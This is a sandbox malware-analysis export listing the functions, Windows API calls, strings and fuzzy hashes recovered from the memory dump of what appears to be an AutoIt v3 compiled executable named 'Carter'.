Instruction Fuzzy Hash: C4A278716183419FCB24EF18C580B2AB7F1BF89304F15896DE89A8B361D771ED45CBA2

Function 00AE494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00ACFC86), ref: 00AE495A
FindFirstFileW.KERNEL32(?,?), ref: 00AE496B
FindClose.KERNEL32(00000000), ref: 00AE497B

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
Instruction ID: a693949508d0b37af7e21b2ba180a89f261ffeabda5eb766d2e105a75b88cb90
Opcode Fuzzy Hash: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
Instruction Fuzzy Hash: 0EE0DF31820515AB82107B38EC0D8EA775C9E0A339F904705F835E20E0EBB49D9886D6

Function 00A894E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3879f8ed2a87f6dfdc5ec1ed6d185a243b6b8266fe2ee745710d3985ec454f83
Instruction ID: 2ebb767ceeb2b24ec00bc17f2786968d34e47810da72785bc6a26556a21aa6db
Opcode Fuzzy Hash: 3879f8ed2a87f6dfdc5ec1ed6d185a243b6b8266fe2ee745710d3985ec454f83
Instruction Fuzzy Hash: 0A229C74A00206DFDB24EF58C580BBFB7B0FF49310F198169E856AB391E770A985CB91

Function 00A8BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A8BF57

Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6

Sleep.KERNEL32(0000000A,?,?), ref: 00AC36B5

Strings

@GUI_CTRLHANDLE, xrefs: 00AC3816
@TRAY_ID, xrefs: 00AC3FCD
CALL, xrefs: 00A8C277
@COM_EVENTOBJ, xrefs: 00AC3D2E
@GUI_WINHANDLE, xrefs: 00AC37C1
@GUI_CTRLID, xrefs: 00AC376C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: af9c2f4b08ef99beb188d88dd1775b0f3c83efd7e6bef273ebc7b077c83e7bbb
Instruction ID: 8b4a5d4bf44b3d085ead19a4fe27f3b19e2b912cafaadd6bf574636732c8a6be
Opcode Fuzzy Hash: af9c2f4b08ef99beb188d88dd1775b0f3c83efd7e6bef273ebc7b077c83e7bbb
Instruction Fuzzy Hash: 9AC2AF716083419FDB24EF24C994FAEB7E0BF84304F15891DF58A9B2A1DB71E944CB92

Function 00A833E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 67
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A83444
RegisterClassExW.USER32(00000030), ref: 00A8346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
LoadIconW.USER32(000000A9), ref: 00A834C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1

Strings

+, xrefs: 00A8342D
0, xrefs: 00A83426
TaskbarCreated, xrefs: 00A83474
AutoIt v3 GUI, xrefs: 00A83460

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: dcdd6345a9fc27619fe2e0548fe947f508f21a87138cfe44297933ca715a6fab
Instruction ID: 8e4b1e057d8be9c1f91c6e1ef2bb08db1687b09a40301c4b7b53b1e93747e3da
Opcode Fuzzy Hash: dcdd6345a9fc27619fe2e0548fe947f508f21a87138cfe44297933ca715a6fab
Instruction Fuzzy Hash: 013116B5954309EFDB40DFA4D889BC9BBF4FB09310F50815AF590A72A0EBB50681CF90

Function 00A83411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A83444
RegisterClassExW.USER32(00000030), ref: 00A8346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
LoadIconW.USER32(000000A9), ref: 00A834C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1

Strings

+, xrefs: 00A8342D
0, xrefs: 00A83426
TaskbarCreated, xrefs: 00A83474
AutoIt v3 GUI, xrefs: 00A83460

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: db2481cc45551abe8e041504cfdf34f0d4a677e984364cd63c4ab6baaa9535ed
Instruction ID: f31650442481fcaafbbc9c50319c4ef66ceb4bc40a59f4f09c6d35b788c6ce3b
Opcode Fuzzy Hash: db2481cc45551abe8e041504cfdf34f0d4a677e984364cd63c4ab6baaa9535ed
Instruction Fuzzy Hash: 2F21E2B5964209AFDB00EFA5EC88BDDBBF4FB09700F40811AF510A72A0DBB11684CF91

Function 00A92FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A93094), ref: 00AA00ED

Part of subcall function 00AA08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A9309F), ref: 00AA08E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A930E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AD01BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AD01FB
RegCloseKey.ADVAPI32(?), ref: 00AD0239
_wcscat.LIBCMT ref: 00AD0292

Strings

\Include\, xrefs: 00A9309F
Software\AutoIt v3\AutoIt, xrefs: 00A930D8
Include, xrefs: 00AD01B1, 00AD01F2
\, xrefs: 00AD02B5

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 967bb0adf91945599c7ef3a8f1c28f2d829f61ec4b4bf5b4a344c7c8af752fa1
Instruction ID: b4d01445b2e9865e76340494e6cfc0ab1465e6cf64b3ae3b0a0945baa3ce7a47
Opcode Fuzzy Hash: 967bb0adf91945599c7ef3a8f1c28f2d829f61ec4b4bf5b4a344c7c8af752fa1
Instruction Fuzzy Hash: CC715A755057019EC714EF25E9859AFBBE8FF4A340F80052EF545872A1EFB09A88CB52

Function 00A9514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A95156
LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
LoadIconW.USER32(00000063), ref: 00A9517C
LoadIconW.USER32(000000A4), ref: 00A9518E
LoadIconW.USER32(000000A2), ref: 00A951A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
RegisterClassExW.USER32(?), ref: 00A9521C

Part of subcall function 00A83411: GetSysColorBrush.USER32(0000000F), ref: 00A83444
Part of subcall function 00A83411: RegisterClassExW.USER32(00000030), ref: 00A8346E
Part of subcall function 00A83411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
Part of subcall function 00A83411: InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
Part of subcall function 00A83411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
Part of subcall function 00A83411: LoadIconW.USER32(000000A9), ref: 00A834C2
Part of subcall function 00A83411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1

Strings

AutoIt v3, xrefs: 00A9520B
0, xrefs: 00A951FA
#, xrefs: 00A95201

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 47e3b98ff09a5d7ba1d238f6e5069f79e41b1fbf119f33c217a053da001ebe30
Instruction ID: 0f12deb6287ba2a4e4b12cb53c2ab1202f5c9bb6b6c23168952341082ef5c65a
Opcode Fuzzy Hash: 47e3b98ff09a5d7ba1d238f6e5069f79e41b1fbf119f33c217a053da001ebe30
Instruction Fuzzy Hash: 0F212879A94308AFEB119FA4ED09B9D7BB4FB0A710F00415AF504A72A0DFF55A50CF84

Function 00AF5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00AF5E7E
inet_addr.WSOCK32(?,?,?), ref: 00AF5EC3
gethostbyname.WS2_32(?), ref: 00AF5ECF
IcmpCreateFile.IPHLPAPI ref: 00AF5EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AF5FD8
WSACleanup.WSOCK32 ref: 00AF5FDE

Strings

Ping, xrefs: 00AF5F01

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4cd4ebb9549287e7d6dfe621b3402919998a1086a82f8021c02b3bdb052bb73f
Instruction ID: 49832ca743681e398d5ce459e6e5cd36a4fe5a3e921d90acfd4f116fd2791ff4
Opcode Fuzzy Hash: 4cd4ebb9549287e7d6dfe621b3402919998a1086a82f8021c02b3bdb052bb73f
Instruction Fuzzy Hash: 9F516C31A04605AFDB20EF74CD49B6AB7E4AF48710F148569FB56DB2A1DB70ED40CB42

Function 00A94D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00A94E22
KillTimer.USER32(?,00000001), ref: 00A94E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A94E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A94E7A
CreatePopupMenu.USER32 ref: 00A94E8E
PostQuitMessage.USER32(00000000), ref: 00A94EAF

Strings

TaskbarCreated, xrefs: 00A94E75

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: bf9ba046e8bcf904b3525659e6faad6a7a133dbe4754c60959096a139f471b3f
Instruction ID: 897d1774475106063faa261d095eebc406ecf9df7ba4eb654ff79dc35553869b
Opcode Fuzzy Hash: bf9ba046e8bcf904b3525659e6faad6a7a133dbe4754c60959096a139f471b3f
Instruction Fuzzy Hash: 3141047135820AABEF116F249D4DFFE36E5FB4A300F040615F502922A2CFB49D52D761

Function 00A956F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AD0C5B

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

_memset.LIBCMT ref: 00A95787
_wcscpy.LIBCMT ref: 00A957DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB
__swprintf.LIBCMT ref: 00AD0CD1

Strings

E#E#, xrefs: 00AD0C95, 00AD0C9E, 00AD0CA9, 00AD0CB7, 00AD0CA2, 00AD0CAD
AutoIt - , xrefs: 00A95760
Line %d: , xrefs: 00AD0CCB

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt - $E#E#
API String ID: 230667853-1317277412
Opcode ID: 23cce7f9c6edfc3f267f573d8ca5c85353754d8f3871279488ddf1d02fa695a2
Instruction ID: 5f4a0f08a4b015a5591e3a2f27d045797544370d18fe9267dff2096195fee711
Opcode Fuzzy Hash: 23cce7f9c6edfc3f267f573d8ca5c85353754d8f3871279488ddf1d02fa695a2
Instruction Fuzzy Hash: 1041C371548301AACB21EBA0DD86FDF77ECAF45350F000A1EF185931A1EF74A648CB96

Function 00A950DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
ShowWindow.USER32(00000000), ref: 00A9513E
ShowWindow.USER32(00000000), ref: 00A95147

Strings

AutoIt v3, xrefs: 00A95101, 00A95106, 00A95107
edit, xrefs: 00A95124

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 3814b7077104619d9ea6b1c8d679ee0bff41ae1b4887a554a8605b7877d6af7d
Instruction ID: a0637f9bec259105b620521c3a0f13a029b7964e14d6ec9da6c4bd32d3abcf45
Opcode Fuzzy Hash: 3814b7077104619d9ea6b1c8d679ee0bff41ae1b4887a554a8605b7877d6af7d
Instruction Fuzzy Hash: 37F0DA75595294BEEA312B276C48E672E7DE7C7F50F00411AB900A31B0CEF11991DEB0

Function 00AE9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4

Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4

_free.LIBCMT ref: 00AE9C5F
_free.LIBCMT ref: 00AE9C66
_free.LIBCMT ref: 00AE9CD1

Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB

_free.LIBCMT ref: 00AE9CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00AE9B8F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: caf1c36b72c323921c34ab7f50917bc26bc4737177d4473bec785845541200b9
Instruction ID: 9361d79e5db46f4447eba50af48875057be6ff3220ae9e5db89c701848403602
Opcode Fuzzy Hash: caf1c36b72c323921c34ab7f50917bc26bc4737177d4473bec785845541200b9
Instruction Fuzzy Hash: EC514CB1E04259AFDF24DF65DD41AAEBBB9FF48304F10009EB649A3381DB715A908F58

Function 00AA563D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00AA569B
_memcpy_s.LIBCMT ref: 00AA570D
__read_nolock.LIBCMT ref: 00AA576B
__filbuf.LIBCMT ref: 00AA578E
_memset.LIBCMT ref: 00AA57D2

Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: cb2303f1d3e9c89c51e9e2cccbf7490f827f949af38301549dcfd1a51d3f8236
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 4E51C930E00B05DBDB288F79D98066E77B5AF42320F688B29F835A72D1D7709D509B48

Function 00A852B0 Relevance: 7.6, APIs: 5, Instructions: 99
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A8534A
TranslateMessage.USER32(?), ref: 00A85356
DispatchMessageW.USER32(?), ref: 00A85360

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 1fe3d4a685245b42c205b5248c4bca777dc28103c8e7aaa08d5d9d260b73d281
Instruction ID: 77a65f453bcd6b79625028ca92479c1dbfad25418a90dcee57b55d6785c5642b
Opcode Fuzzy Hash: 1fe3d4a685245b42c205b5248c4bca777dc28103c8e7aaa08d5d9d260b73d281
Instruction Fuzzy Hash: 4F31E130D48B069AEB30AB74DC44BF93BF8EB02344F544169E8229B1A1EFE59985E711

Function 00A81284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812EB

Strings

Control Panel\Mouse, xrefs: 00A812A6

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
